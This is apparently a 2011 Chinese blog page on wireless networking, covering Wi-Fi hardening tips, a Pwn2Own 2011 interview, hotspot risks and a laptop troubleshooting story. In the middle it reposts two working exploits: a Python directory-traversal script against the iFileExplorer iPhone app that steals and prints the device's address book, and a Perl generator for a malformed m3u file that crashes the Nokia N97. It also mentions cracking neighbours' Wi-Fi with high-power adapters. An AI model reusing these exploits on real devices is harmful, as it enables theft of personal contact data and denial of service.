  无线网卡主流的标准是IEEE 802.11n,它大幅提升无线局域网竞争力,无线局域网标准、技术快速发展,产品逐渐成熟,无线局域网的应用也日益丰富。越来越多的家庭用户开始使用无线网络,许多企业也纷纷在自己的办公大楼内布设无线局域网,同时,电信运营商对无线局域网也给予了极大关注,现在无论是在机场、酒店、咖啡厅等公共区域铺设公众无线网络,给大家提供方便的无线上网。
Mar
24
2011
无线网络安全无线网络中怎么隐藏无线网络  
  无线网络中怎么隐藏电脑
  要在无线网络中隐藏自己的电脑,方法有很多,例如单击“开始/运行”,然后输入“cmd”开启命令提示符窗口,在该窗口中输入“net config server /hidden:yes”,或者在无线网络连接的属性窗口中,取消“Microsoft网络的文件和打印机共享”,这样其他人通过网上邻居就无法找到自己的电脑了。
  为了防止电脑的IP地址泄漏,可以启动无线网络连接的防火墙功能,并在防火墙属性的“高级”标签中设置ICMP,将所有传入和传出请求都禁止,这样别人就无法用ping.exe来判断自己的电脑是否在线了。
  WinXP默认自动管理无线网络,实际上只有需要访问无线网络资源时,才有必要让系统自动连接到无线网络,所以在平时可以取消“用Windows配置我的无线网络设置”选项,这不但安全,而且更加节省了资源。或者点击“高级”按钮,取消“自动连接到非首选的网络”,这样系统不会轻易连接到以前没有检测到的无线网络。
  无线路由器隐身却可访问
  要在空气中隐藏无线路由器最直接的方法是让它停止SSID广播,SSID广播功能将无线路由器所创建的无线网络让客户端可以搜索到,这虽然方便了用户接入无线网络,但是也方便了非法接入,所以在需要安全的场合,比如公司网络,最好将它禁止。
  这样一来,用WinXP或无线网卡自带程序就无法像平常一样搜寻到该无线路由器创建的无线网络,要访问它就只能手动添加首选网络并指定SSID名称。
  隐藏SSID广播却无法对付NetStumber,它还是可以检测到隐藏的无线网络,所以必须再利用无线路由器本身的一些功能,包括了停止DHCP服务并且修改LAN口的默认IP地址,由于无线网络的SSID采用广播方式向外发散,即使无线网络被检测到,如果入侵者没有获得或配置与无线路由器同网段的IP地址,还是无法连接到无线路由器的,这也是TCP/IP网络连通讯的先决条件,即同个网络间设备的IP地址必须在同一网段。
Mar
24
2011
一年一度的Pwn2own黑客大赛已经落下帷幕。这次大赛有哪些亮点?浏览器和手机安全问题是否迫在眉睫?这次我们有幸邀请到圈子里两位知名的网络安全研究人员,一起聊一聊2011年的Pwn2own。

附采访实录:

关于智能手机安全的问题,今天我们有幸采访到资深无线安全研究人员,《无线网络安全攻防实战》系列书籍的作者 杨哲。

问:Pwn2own2011年的黑客大赛已经落下帷幕了。我们发现目前有一些人认为,越是开放的手机系统越不安全。这次参与比赛的四款手机系统,有开源的,也有封闭的。是不是越封闭的系统,比如是windows mobile,攻破的难度就越大呢?

答:不是这样的,我们举个例子,在过去的10多年来,Windows由于其便捷的窗口化操作和用户不可见的后台处理机制,赢得了大量的用户。但与此同时,也吸引了大量的黑客及组织对其研究,那最终的结果我们都知道,就是微软的漏洞数量和发布频率要比其它操作系统高很多,而直到现在Windows并没有像Linux一样开源。同样地,在智能手机领域,Windows Mobile占据的江山可以说还没有达到和Windows XP这样一个级别,所以可以看到在06年以前无论是手机病毒还是攻击的对象都主要是Nokia的Symbian,为什么呢,因为Nokia占据了80%的手机市场。但在最近几年,随着使用Windows Mobile系统的智能手机在市场占有率的提高,也爆出了多个威力比较大的漏洞,比如09年比较出名的HTC智能手机爆出的蓝牙协议栈漏洞,这个漏洞是由于HTC在开发基于Windows Mobile的蓝牙驱动时的疏漏所致,但经过测试,发现它影响到了09年7月前出厂的几乎所有基于Windows Mobile6/6.5的HTC手机。

总的来说,就是说,并不是封闭的系统,其攻破的难度就越大。按照这个理论,那是不是说只要选择闭关锁国,这样就可以无敌了?呵呵

问:此次比较遗憾的是,Windows Mobile和Android平台的攻击者没有来到大赛的现场。之前看到一些报道,Android平台的安全问题会是2011年比较让人担忧的,你觉得是这样吗?为什么Android的安全问题开始浮出水面?

答:我们都知道,绝对的安全是不存在的,所以Android的问题肯定是有的,比如去年底国外一些黑客组织就陆续发布了针对Android2.0/2.1的多个0Day攻击漏洞,可以导致用户的智能手机远程执行恶意代码、资源耗尽导致死机等。其实无论任何操作系统,安全问题都是存在的,只是其流行程度和关注程度还远没有达到临界点罢了。这个临界点就是由手机的用户数量、流行程度所决定的。这个道理就如同我们刚才提到的Windows一样。

问:您觉得此次pwn2own黑客大赛的亮点是什么?这样的比赛,它的意义在哪里?

答:亮点就是手机厂商与安全人员甚至是黑客的正面对决,这表明了厂商愿意从根本上提高自身安全,愿意对潜在的安全问题负责,愿意为用户负责的态度。相信很多朋友都愿意看到这种让厂商直面自身安全隐患,将其所谓的自信直接放在炉上烤的感觉,这比厂商发布100个公告和声明要有意义的多。这个比赛让我想起了数年前某个防火墙厂商的一个悬赏活动,在单位时间内只要攻破其防火墙设备访问到后方的某一个指定文件,即可获得5万元的奖励。这个Pwn2Own与其性质完全一致,但在这么多主流移动设备供应商的支持下,特别是重赏之下必有勇夫嘛,一些安全研究人员也愿意将自己的技术展现出来,来向很多厂商疏漏的角度展开攻击,这对厂商的提高也是巨大的,所以说,Pwn2Own黑客大赛的深远意义要高出了很多。

问:在智能手机安全领域,我们之前也采访过一些手机安全厂商,目前他们还没有看到大规模的手机木马、病毒的爆发,当前的手机安全软件也大多定位在在隐私保护和软件管理上,您估计手机安全问题到什么阶段可能会大规模爆发?

答:恩,其实主要是因为国内确实没有面临过大规模手机病毒爆发的事件,所以目前国内的手机安全防护类软件主要偏向于隐私保护上,但在国外,早在04年起,自从针对Nokia的Cabir等手机蠕虫病毒的泛滥,使得很多国际上比较有名的产品对手机木马病毒方面的关注度还是很高的,

比如Mcafee、赛门铁克、Kapersky、F-Secure等等。

问:有人认为手机安全问题会随着手机支付的发展而凸现出来,您是怎么看待智能手机平台的黑色产业链和潜在的利润体系的?

  答:显然地,由于国情的不同,对于中国来说,非法软件在手机后台吸费将会是这几年来主要的问题,不过手机自身的安全问题也将受到越来越多的关注,比如现在很多人开始陆续享受到的手机支付等,也将随着普及而出现新的安全问题。而作为黑色产业链这个问题已经不是一两家安全公司、团体或者单纯的手机安防软件能够解决的问题,它需要多个相关部门的联合才能够最大程度地堵住这个黑洞。

++++++

关于浏览器安全的问题,我们来咨询一位在国内知名安全公司工作的技术大拿。对客户端软件安全和Web安全有着很丰富的经验。不过他现在不太方便透露自己的姓名。所以呢,我们这边就不做介绍了。

问:关于Pwn2own2011黑客大赛有几个问题想跟您沟通一下,pwn2own黑客大赛已经结束了,在浏览器的部分, Chrome和Firefox浏览器都没有被攻破,而值得一提的是Chrome浏览器连续3届黑客大赛上都顺利过关,您觉得Chrome的安全性真的是一个神话吗?

答:Chrome的安全系数是比较高的,但是它并不是绝对的安全。为什么chrome的其安全性很高呢?主要有两个方面的原因,一个是谷歌提供了一个有偿的安全谷歌计划,也就是如果有安全人员发现了chrome的安全漏洞,就会有一个有偿的补助,是1000美元到3000美元不等,所以很多安全研究人员发现了chrome的安全漏洞就会上报给谷歌;然后另外一个方面就是,chrome的有一个安全的沙盒,也就是如果chrome有这么一个安全漏洞,但是(黑客利用这个漏洞)并不能直接攻击chrome,也就是说浏览器虽然存在安全漏洞,但是不能被直接攻击。也就是chrome没有被攻破的最主要原因。

问:也就是说攻击者要绕过这个沙盒才能对chrome进行攻击?

答:对。

问:那您刚才说的有偿计划,其他浏览器厂商没有这种机制吗?

答:Firefox也有这种有偿补助,所以这两个浏览器的安全系数高一些,火狐在参加这个大赛之前就已经修复了十多个安全漏洞。

问:所以说它(Firefox)在这次比赛有点侥幸的因素在里边是吧?

答:对

问:第二个问题,作为一名安全研究人员来说,您平常最常用的浏览器是什么?

答:火狐。

问:为什么?

答:因为火狐是一个老牌的插件浏览器,它有很多的插件,可以方便日常的一些工作。

问:那这是从使用功能方面来说的,那其他方面呢?

答:其他方面的话,它最主要的特点就是开源,你可以了解到这个浏览器最近有没有什么安全漏洞,或者可以在开源社区里讨论它的安全漏洞或者防护措施之类的,都可以在第一时间知晓。

问:那我问最后一个问题,和技术有点相关的,就是您能介绍一下常规的浏览器漏洞挖掘技术都有哪些吗?

答:常规的浏览器漏洞挖掘技术的话应该是两块,一块是闭源的,闭源的话主要靠逆向,像(攻击)IE浏览器主要靠逆向,逆向的话是可以直接从源代码分析浏览器的一些漏洞。另外一种是fuzzing也就是模糊测试这种方法,来发现黑盒这种方式测试浏览器的漏洞。

对话IT主持人:

鲜橙、嘉文

文章转载 http://netsecurity.51cto.com/art/201103/249796.htm
Mar
19
2011
Android 2.0 ,2.1, 2.1.1 最新攻击0day代码

有编程基础的看看呗,就当提高!

文章转载:http://bigpack.blogbus.com/logs/109447632.html
Mar
19
2011
2011年的Pwn2Own2011黑客大赛终于落幕,各家的浏览器和手机的安全情况究竟如何呢?一起来听听关于这次大赛的战报。
点击在新窗口中浏览此图片
选手们正在研究中
点击在新窗口中浏览此图片
Safari和IE被攻破
人物简介:主持人:鲜橙、嘉文
本期参与录制人员:嘉文、鲜橙、李唐、阿川、九鬼様
Mar
19
2011
iPod Touch/iPhone iFileExplorer Free Directory Traversal
文章转载 http://bigpack.blogbus.com/logs/108926145.html

# Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal
# Date: 04/03/2011 #UK date format
# Author: theSmallNothing
# Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8
# Version: 2.8
# Tested on: iPod Touch 2G (4.1)

import urllib, sqlite3

base = "http://192.168.0.3/" #Change to iDevice ip
url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address

try:
    urllib.urlretrieve(url,"addressbook.sqlite")
    print "Grabbed Address Book\n"
except:
    print "Could not grab address book..."

conn = sqlite3.connect("addressbook.sqlite")
cursor = conn.cursor()
cmd = "SELECT * FROM ABPerson"
cursor.execute(cmd)
results = cursor.fetchall()
for person in results:
    if person[1] == None:
        continue
    print person[1], person[2]
    
    cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0])
    cursor.execute(cmd)
    vunDataArr = cursor.fetchall()
    for vunData in vunDataArr:
        if vunData[5] != None:
            print "\t"+vunData[5]
Mar
19
2011
Nokia N97 m3u Playlist Crash PoC

转载于http://bigpack.blogbus.com/logs/108925938.html

#!/usr/bin/perl

###
# Title : Nokia N97 (PlayList M3U) Crash PoC
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : hardware
# Impact : Crashs & Reboot (Some Times Rebooted )
# Tested on : Nokia N97 v 22.0.110 ( Type RM-505)
# Target :  N97 Mobile
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Usage : Run the (Gestionn de Fichiers)  And Open The (m3u) File with 'Lect.Audio'
#        ==> The (Gestionn de Fichiers) and ( Lect.Audio) is Blocked And Crashed !!
###
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";          
print "    |===========================================================|\n";
print "    |= [!] Name : Nokia N97 (PlayList M3U) vApp 22.0.11        =|\n";
print "    |= [!] Exploit : Local Crash PoC                           =|\n";
print "    |= [!] Author : KedAns-Dz                                  =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
print "    |===========================================================|\n";
sleep(2);
print "\n";
my $file = "n97.m3u";
my $Header = "#M3U\n"; # Header Format M3U
my $ccq = "\x4d\x75\x73\x69\x63\x5c"; # Stock32Gb:\...\Music\  << you are can change this
my $junk = "\x41" x 100000 ; # Junk
my $nop = "\x90" x 55 ; # !| Nop |! x 55
open($FILE,">$file");
print $FILE $Header.$ccq.$junk.$nop ; # Evil File
close($FILE) ;
print "\n[!] Creating $file file...\n";
print "\n[+] File successfully created!\n";

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

Wireless N.T | Tags: , , | 0 , 1157 Ķ
Mar
19
2011
  
  USB无线直接接在电脑的USB接口上,与大功率无线网卡不同,它可以加大功率,属于无线网络接收器。 一种以内置雷凌3070芯片为核心的网卡,连接电脑USB接口,自动搜索附近大面积的无线网络,配合黑客软件解密,强行“共享”无线网络的“无线网卡”,实现免费无线上网。
点击在新窗口中浏览此图片
  无线标准
  目前市面上的无线局域网设备主要支持IEEE 802.11g和IEEE 802.11n两种标准。支持IEEE 802.11g+标准的网卡,最高传输速率是108Mbps;支持IEEE 802.11n标准的网卡,最高传输速率是300Mbps,而支持IEEE 802.11b标准的网卡,最高速率仅有11Mbps;支持IEEE 802.11g标准的网卡,最高速率是54Mbps,这些标准都是向下兼容的,消费者在选购的时候就要留意,不要买错或被JS忽悠。
  接口
  USB无线网卡接口主要分USB 2.0、1.1、1.0三种,现在绝大部分USB接口的无线网卡都已经采用USB2.0接口。USB2.0接口能够提供480Mbps的数据通信带宽,而USB1.0则速度要慢得多。
  发射功率
  只要是无线局域网设备都有一定的发射功率,USB无线网卡的发射功率当然是越高越好,这样它的传输距离就越远,我们在选购的时候尽量选择发射功率较高的无线网卡。特别是带有天线技术的,它能够提高无线网卡信号覆盖范围,让用户可以拥有高效稳定的无线网络。
  产品外形
  USB无线网卡可以分为盒型和U盘型两种外观形式。盒型的USB无线网卡标配带有一条数据延长线,大部份都是天线外露,这些设计是为了方便它放置在桌面;而U盘型的USB无线网卡同样标配数据延长线,它的USB接口可以直接插入电脑的USB接口,由于它的天线都是内置,所以不能够不便调节天线的方向。两者在外形上相比之下,U盘型的无线网卡更小巧方便携带。
Mar
6
2011
九个技巧保护无线网络安全连接  
  无线网络系统如果没有采取适当的安全措施,无论这个无线系统是安装在家中还是办公室里,都可能引发严重的安全问题。事实上,一些针对住宅区提供互联网服务的提供商已经在他们的服务协议中禁止用户和其它非授权人共享联网服务。一个不安全的无线网络可能造成服务丢失或是被利用来对其他网络发起攻击。为了避免类似的一些无线网络安全漏洞,这里我们介绍几种便捷的无线网络安全技巧。
  使用无线加密协议
  无线加密协议(WEP)是无线网络上信息加密的一种标准方法。现在出产的无线路由器几乎都向用户提供加密数据的选择,妥善使用此功能就可以避免自己的银行账户的细节信息(包括口令等)不会被居心叵测的人截获。不过,需要注意,Wi-Fi保护访问技术(WPA和WPA2)要比WEP协议更加强健,因此在保障无线通信安全方面作用更大。
  使用MAC地址过滤
  在正常情况下,无线路由器和访问点都拥有防止未知的无线设备连接到网络的能力。这种功能是通过比较试图连接到路由器的设备MAC地址和路由器所保存设备的MAC地址而实现的。不过,不幸的是,在路由器出厂时这种特性通常是关闭的,因为这需要用户的一些努力才能使其正确工作,否则反而无法连接网络。因此,通过启用这种特性,并且只告诉路由器本单位或家庭中无线设备的MAC地址,我们就可以防止他人盗用自己的互联网连接,从而提升安全性。 但不要完全依赖这条措施,也可以这样说,使用MAC地址过滤并不是对付死心塌地地克隆MAC地址并试图连接到用户无线网络的黑客们的救命良药,但你确实应当采用这项措施来减少网络风险。
  设置安全口令
  为无线的互联网访问设置一个口令至关重要。选择一个强口令有助于无线网络的安全,但不要使用伴随无线路由器的默认口令,也不要使用可从字典上轻易查出的单词或家人的生日等作为口令。在不使用网络时将其关闭如果用户的无线网络并不需要每周的24小时都提供服务,可以通过关闭它而减少被黑客们利用的机会。虽然许多企业并不能离开网络,而且将这条建议付诸实施可能不太现实。但对一个系统安全性的最重大改进措施之一就是直接关闭它。因为没有任何人可以访问一种并不存在或打开的服务。
  监视网络入侵者
  用户应当一直监视网络活动,并保障跟踪其趋势。用户特别是管理员对恶意的黑客活动了解得越多,就越容易找到应对策略。网管员应当收集有关扫描和访问企图的日志,并利用现有的大量统计数字生成工具,以便于将这些日志变为更有用的信息。还要设置日志服务器,使其在发现确实有恶意活动发生时能够向管理员发送警告或电子邮件。笔者认为,了解危险相当于赢得了斗争胜利的一半。
  改变服务集标识符并且禁止SSID广播
  服务集标识符(SSID)是无线接入的身份标识符,用户用它来建立与接入点之间的连接。这个身份标识符是由通信设备制造商设置的,并且每个厂商都用自己的缺省值。例如,3COM的设备都用“101”。因此,知道这些标识符的黑客可以很容易不经过授权就享受你的无线服务。你需要给你的每个无线接入点设置一个唯一并且难以推测的SSID。 如果可能的话,还应该禁止你的SSID向外广播。这样,你的无线网络就不能够通过广播的方式来吸纳更多用户,当然这并不是说你的网络不可用,只是它不会出现在可使用网络的名单中。  
  仅在某些时段允许互联网访问
  现在出产的一些最新无线路由器允许用户将对互联网的访问限制在一天的某些时段。例如,如果你不需要从周一到周五的上午8点到下午6点之间访问互联网,那么干脆打开你的路由器设置来禁用这些时段的访问!
  禁用动态主机配置协议
  这好象是一个奇怪的安全策略,但是对于无线网络,它是有道理的。通过这个策略,你将迫使黑客去破解你的IP地址,子网掩码,和其它必需的TCP/IP参数。因为即使黑客可以使用你的无线接入点,他还必需要知道你的IP地址。
  禁用或修改SNMP设置
  如果你的无线接入点支持SNMP, 那么你需要禁用它或者修改默认的公共和私有的标识符。你如果不这么做的话,黑客将可以利用SNMP获取关于你网络的重要信息。
Mar
6
2011
  无线局域网络是相当便利的数据传输系统,它利用射频的技术取代旧式碍手碍脚的双绞铜线所构成的局域网络,使得无线局域网络能利用简单的存取架构让用户透过它,获得信息更加方便快捷。
  随着无线技术的普及,无线组网逐渐成为趋势,无线网络与有线网络相比有着明显的优势,首先无线网络的每个客户端不必再连接一条条的双绞铜线,其次在网络的维护上WLAN也要比有线局域网方便很多,因此不管是家庭还是中小企业对无线组网的需求越来越强烈。那么在搭建无线局域网时,我们究竟该如何布置,才能让无线局域网高效运行,布置过程中应该注意哪些方面,从而达到提升工作效率的目的呢?下面我们从几点来谈一谈:
点击在新窗口中浏览此图片
  无线局域网最大优点
  众所周知,有线网络的工作稳定性、传输性能都是值得肯定的,但是搭建有线局域网受环境、地理、成本等影响,并且改动不太灵活方便。而无线局域网有着许多不可比拟的优势,没有环境的影响,不受地理因素的限制,减少了布线的高成本需求,更重要的是日后改动十分方便,并且可以任意的扩展数量,不增加成本的支出,为企业和家庭带来最大的方便性。
  无线局域网的组建需注意什么?
  在布置无线局域网网络时,我们往往需要仔细考虑许多细节因素,才能保证搭建成功的无线局域网具有很高的工作性能:
  一,在企图通过无线局域网连接远程局域网时,远程局域网所在的建筑物应该尽量保持明确的视线,如果无线局域网要穿过高大的建筑物或茂密的树木等障碍物时,那么搭建成功的无线局域网传输性能就不会十分完美,毕竟那些障碍物会直接影响无线局域网数据信号的正常传输。
  二,当远程网络与本地局域网之间的距离比较远时,我们可以适当降低网络传输带宽的大小,达到远距离数据传输的目的,实在需要进行远距离无线传输的话,我们不妨尝试在中间设立无线局域网中继中转站,以便让上网信号绕过障碍。在无线局域网上网信号进行近距离传输时,为了确保能够获取最大的传输带宽,那样一来就能将几个无线网桥互相集成在一起,同时无线局域网的天线高度基本不会受到影响。
  三,无线局域网的天线高度进行合适设置也是非常重要的,倘若我们没有将无线局域网设备的天线高度设置得好,单纯依靠增大天线增益方法或增大功率放大方法,获取的无线传输效果将十分有限。那么我们可以考虑将无线节点设备的天线布置在建筑物的最顶层上,并且尽量利用小型天线以便确保无线电波的相对集中,这样有利于有效避免来自其他无线局域网上网信号的干扰。
  四,尽管无线局域网传输采用了跳频技术,使得上网信号的频率载波很难被检测到,如此一来只有当双方无线设置了相同的网络ID标识号,才能进行无线上网信号的安全传输。如果要进一步保证无线局域网的运行安全性,我们还可以对无线上网信号进行加密。
  灵活选用无线局域网结构在室外搭建无线局域网网络时,我们通常可以有下面几种结构可以选用,例如点对点结构、一点对多点结构、多点对一点结构以及混合结构。不同的搭建结构,适用于不同的工作场合,我们必须依照实际情况进行有针对性选择。
  点对点
  这种无线局域网搭建结构一般用于需要无线连接的两个固定位置之间,这种搭建结构几乎是最常用的一种无线连网方式,使用这种搭建结构架设而成的无线局域网网络,一般能获取较高的无线信号传输速度,并且也利于无线上网信号的远距离传输,受外界传输信号干扰的影响比较小。
  一点对多点
  这种无线局域网搭建结构常用于单位局域网有一个中心点,多个远程工作点的场合下。选用该结构搭建而成的无线局域网往往具有组网成本比较低廉、网络维护简单等优势,同时由于单位局域网中心使用了全向天线,无线上网调试起来相对容易一些。
  多点对一点结构
  这种无线局域网搭建结构其实是多个点对点结构的有效组合,在存在多个远程工作点、一个中心点的局域网网络中经常会使用这种搭建结构,每一个远程工作点在中心点位置处都有各自对应的设备,该搭建结构往往具有性能可靠、传输稳定的优势。
  混合结构
  这种无线局域网搭建结构几乎适用于局域网中所有的远距离工作站点、近距离工作点,甚至还适用于有障碍物阻挡的那些工作点,在搭建相对复杂的无线局域网网络时,我们就可以尝试使用点对点结构、一点对多点结构、多点对一点结构这几种类型混合在一起的网络连接方式,例如在布置远距离工作点时可以考虑使用点对点连接方式,布置近距离的工作站点时可以采用一点对多点的连接方式,布置有障碍物阻挡的工作点时可以采用中继连接方式。
  总结
  无线局域网在搭建网络时,往往会选用信号比较强的无线设备,事实上,这种方法是不正确的。无线设备的信号能力越强,无线访问的灵敏度就越高,无线上网信号在传输时的穿透能力就会越强。不过,要是无线设备的信号太强的话,无线局域网的有效信号覆盖范围很大,可是实际可控的区域范围恰恰变小了,无线局域网的上网安全性反而会受到明显影响。
Mar
6
2011
在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA来实现对Internet的接入。但是,安全专家认为,随着雇员们经常在无线热点登录,他们将会在不知不觉中将个人及企业的数据暴露出去。虽然目前这种危险还没有兴风作浪,但是由于越来越多的单位依赖于笔记本电脑、PDA设备、智能电话,无线灾难的降临也是迟早的事。

其实,IT可以采取一些措施,保护用户在免受无线热点的危险。例如:

1、对于那些试图访问公司网络的设备而言,企业应当建立并强化强健的认证策略。

2、在雇员进行连接并交换数据时,要求雇员使用公司的VPN。此外,还要设置雇员的计算机,使其自动连接到VPN,并对数据加密。

3、确保所有的设备和软件都配置正确,并安装最新的补丁。

4、确保公司的安全策略防止员工将敏感数据传输到移动设备或未授权的计算机。

5、不使用热点的无线连接,而是使用无线网卡。

在无线热点发生的数据泄露难以发现,且这种数据往往是通过电子邮件进出这些所谓热点的。所以,对于从事商业的人来说,理解保护自己的责任是非常重要的。

多数雇员并不知道

虽然许多技术人员明白这些漏洞的风险,但安全人员认为普通员工并没有得到明确的通知,这会使得许多珍贵的数据易受攻击。

这种困难不太容易克服,因为用户们需要移动性。他们希望使用任何移动设备在无线热点访问电子表软件或幻灯片。但是,仅仅一台有漏洞的或配置错误的笔记本电脑就足以使整个公司名誉扫地。

其实,并不是某种特定设备导致问题,而是多种因素的组合使得数据保护成为无线热点的重要问题。

问题之一就是热点自身,无线连接甚至有线互联网连接都可成为危险区域。危险在于公共访问点。风险在于管理员无法控制的网络上。在用户位于公共网络上时,就像没有保护上网一样。此时,你并不知道你的邻居是谁。

不加密的信息在流经这些公共的网络时,那些别有用心的人就可以看到。笔记本电脑、智能电话和PDA等可以与位于公共热点上的其它人通信,甚至在用户并不强求这样做时,也能与对方聊天。

记住,在你与他人共享网络的任何时间,在你的机器与他人彼此共享时,攻击者就可以截获任何人的信息。
Wireless N.T | Tags: , | 0 , 866 Ķ
Feb
13
2011
无法无线上网!这该如何是好呢?不少朋友都会遇到这些问题,那么我们从何切入来解决这个故障呢?不用着急,现在本文就将列出无法无线上网的具体排除的过程,希望对大家有所帮助。

无线网络不能使用

单位办公室有一台“服役”了几年的笔记本电脑,该电脑内置有无线网卡设备,以前单位领导使用该无线网卡设备可以使用、访问无线网络,可最近不知道什么原因,该无线网卡设备始终无法连接到单位的无线局域网中,无法无线上网。不得已,单位领导只好电话“邀请”笔者迅速赶到故障现场,帮助其解决无线网络不能使用的故障现象。

接到领导的命令,笔者丝毫不敢怠慢,立即三步并成两步地赶到故障现场,并对故障现场进行了按部就班地勘查,发现该笔记本电脑经典的老式IBM T30,其内置的无线网卡设备传输速度达到了11M;为了查看该无线网卡设备的工作状态是否正常,笔者依次单击“开始”/“设置”/“网络连接”命令,在弹出的本地网络连接列表窗口中,找到目标无线网络连接图标,并用鼠标右键单击该连接图标,从弹出的快捷菜单中执行“属性”命令,打开目标无线网络连接的属性设置界面。从该界面中笔者看到无线上网信号不是很强,起初笔者还以为是无线上网受到了外界干扰,特地将笔记本电脑转移到上网信号非常强的位置(也就是测试时信号满格的位置),结果发现笔记本电脑还是不能访问无线网络,看来这台笔记本电脑的确不能访问无线网络了。

检查无线路由设置

既然笔记本电脑已经能够探测到无线上网信号,那为什么还无法无线上网呢?那它为什么不能从局域网中的无线路由器那里获得IP地址呢?会不会是无线路由器设置了访问加密的缘故呢?想到这一点,笔者立即以系统管理员身份远程登录进无线路由器的后台管理界面,从中找到无线加密的设置选项,取消了无线加密的功能设置,结果还是不行。难道是无线路由器内置的DHCP服务功能出现了意外,或者干脆没有正常启用?为了检验自己的猜测,笔者从无线路由器的后台管理界面中找到DHCP服务功能选项,仔细查看该选项的数值时,发现DHCP服务处于正常工作状态。这说明笔记本电脑的无线网卡设备不能上网的原因与无线路由器的DHCP服务功能没有任何关系。

在无线路由器的后台管理界面中,笔者偶然发现了该设备自带的防火墙功能、MAC地址过滤功能都处于启用状态,看来单位网络管理员为了防止非法用户偷偷访问无线局域网,对无线路由器设备进行了一些安全限制,会不会是这些安全设置影响了单位领导的笔记本电脑正常访问无线网络呢?为了排除无线上网的一切干扰,笔者打算暂时取消这些安全设置,可是当笔者尝试将无线路由器的防火墙功能、MAC地址过滤功能全部关闭后,发现老式IBM T30笔记本电脑仍然还不能正常访问单位的无线局域网。后来,笔者查找了一下无线路由器设备的操作说明书,发现该设备能够正常支持802.11g、 802.11b等无线通信标准,看来问题不在局域网的无线路由器设备上,而很可能是笔记本电脑自身有问题。

检查本地系统设置

如果本地笔记本电脑有问题,那究竟是哪些因素会影响无线网卡设备正常访问无线网络呢?首先笔者想到的是无线上网设置,因为要是无线网络的SSID名称或其他一些设置不正确时,无线网卡可能就无法准确搜索到局域网中的无线路由器;在检查无线上网设置时,笔者先是按照前面的操作步骤打开目标无线网络连接的设置窗口,单击其中的“无线网络配置”选项卡,打开的选项设置页面,在该设置页面中将“用Windows配置我的无线网络设置”项目选中,同时单击“查看无线网络”按钮,从其后界面中找到目标无线局域网网络,然后单击“属性”按钮,进入具体的无线网络配置对话框,在这里笔者并没有找到可疑的地方,这说明无线上网配置是没有任何问题的。

有没有可能是Windows系统自身设置不当呢?考虑到无线上网时,需要使用无线访问服务、远程调用服务等,要是这些系统服务运行状态不正常时,那么无线上网操作可能就会失败,想到这一点,笔者决定对上面几个系统服务的运行状态进行一下检查。

在进行这项检查操作时,笔者先是依次单击“开始”/“运行”命令,在弹出的系统运行文本框中输入字符串命令“services.msc”,单击“确定”按钮后,打开笔记本电脑系统的服务列表窗口,从中找到可疑的目标系统服务,再用鼠标双击该服务选项,打开如图3所示的服务属性设置窗口,在该设置窗口的“常规”标签页面中,笔者看到无线访问服务、远程调用服务等工作状态都正常,这就意味着无法无线上网的故障现象与笔记本电脑系统的服务状态也无关。在此期间,笔者还顺便检查了Windows系统自带的防火墙参数,以及对Windows系统尝试了文件修复操作,结果发现一切正常,至此,无法无线上网的故障排查工作陷入了僵局。

检查无线网卡设置

在排除了之上无法无线上网各项因素后,笔者开始将怀疑重点转移到笔记本电脑自带的无线网卡设备上了,难道是该无线网卡设备发生了硬件损坏?如果真是那样的话,笔者只有重新更换新的无线网卡设备才能解决问题,但转念一想,平时单位领导不怎么使用无线网卡设备,按理来说该设备发生硬件损坏的可能性还是比较小的,为此笔者打算先从该无线网卡设备的设置着手,来看看该设备是不是出了问题。

于是,笔者立即打开笔记本电脑的设备管理器窗口,从中找到目标无线网卡设备,并用鼠标右键单击该网卡设备,从弹出的快捷菜单中执行“属性”命令,打开目标网卡设备的属性设置界面;当笔者检查到 “高级”标签页面时,偶然发现“802.D Control”选项的数值被设置为了“Strict”,看到这项设置时笔者感到非常奇怪,因为笔者知道,先前无线局域网使用的无线通信标准主要是 802.11b标准,并且工作在2.4G赫兹频段,而目前无线局域网使用的无线通信标准主要是802.11g标准,那么安装在这台老式笔记本电脑中的无线网卡设备怎么会使用802.11d标准呢?

到Internet网络中搜索了相关信息后,笔者发现802.11d无线通信标准主要是针对类似跳频模式、信道化等物理层面定义了一些要求,以便让通信设备满足国家无线电制定的一些特殊管制要求。再返回到老式IBM T30笔记本电脑的无线网卡设置对话框,笔者发现“802.D Control”选项的数值既然为“Strict”,那就表示无线网卡设备在工作的时候必须严格遵守802.11d这一通信标准,而局域网无线路由器设备却只能支持802.11g、802.11b等无线通信标准,看来问题很可能是无线网卡设备的工作标准设置错误了。

弄清楚了无法无线上网的原因后,笔者立即尝试着将目标无线网卡设备的“802.D Control”选项数值重新修改为了“None”或“Flexible”,再单击“确定”按钮保存好上述设置操作,这时再上网访问单位的无线局域网时,发现终于能够正常上网了,至此老式笔记本电脑无法无线上网的故障现象就被彻底地解决了。

最后的小结

